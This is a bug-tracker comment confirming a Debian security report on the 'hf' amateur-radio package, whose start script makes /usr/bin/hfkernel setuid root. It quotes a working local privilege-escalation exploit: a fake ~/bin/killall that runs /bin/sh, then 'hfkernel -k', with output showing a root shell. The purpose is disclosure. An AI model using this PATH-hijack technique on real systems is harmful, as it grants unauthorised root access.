Comment 8 for bug 320082

I can confirm this bug as tested in a chroot environment.

Below is an extract from the Debian bug and functioned the same. It relies on ~/bin being in the $PATH, which is the default .profile function if a ~/bin directory exists.

The hf package, Described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.

 If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel

  Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)